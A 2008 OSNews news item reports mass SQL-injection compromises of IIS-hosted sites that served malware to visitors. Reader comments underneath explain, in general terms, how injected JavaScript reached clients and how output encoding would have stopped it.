Linked by Thom Holwerda on Mon 28th Apr 2008 19:22 UTC, submitted by Hakime
Legal Last week, The Washington Post reported that hundreds of thousands of IIS webservers were hacked. Code was placed on them that installed malware on visitors' computers. Among the infectees were websites from the UK government and the United Nations. Initial reports said the attackers used a security vulnerability in Microsoft's IIS, but the company published more information on the attacks today, and denies IIS was compromised.
Thread beginning with comment 311786
To read all comments associated with this story, please click here.
Dumb Question....
by JPowers on Mon 28th Apr 2008 23:23 UTC
Member since:

If the issue is that someone attacked the server an injected code into the MS-SQL server, then how are the client systems being infected?

The best I can see is that they injected code to turn on a back door so they could modify the web-server.

Thus the security issue is also on the client pc's. They are allowing a web site to install anything the server wants on their pc. SQL Injection shouldn't work on the client since the DB is located on the server.

What types of clients are being infected? And since MS verified that it was a server issue, what is MS's advice on how to protect the client from the servers?

Reply Score: 1

RE: Dumb Question....
by emission on Tue 29th Apr 2008 00:13 in reply to "Dumb Question...."
emission Member since:

The client injection is caused by javascript code that's injected into the database. In other words...

1. SQL injection puts Javascript into he database
2. Injected database content is shown on the page
3. Javascript opens windows with malware

So, the client injection part of this could have been stopped if the web sites used proper HTML encoding of the database output.

Reply Parent Score: 2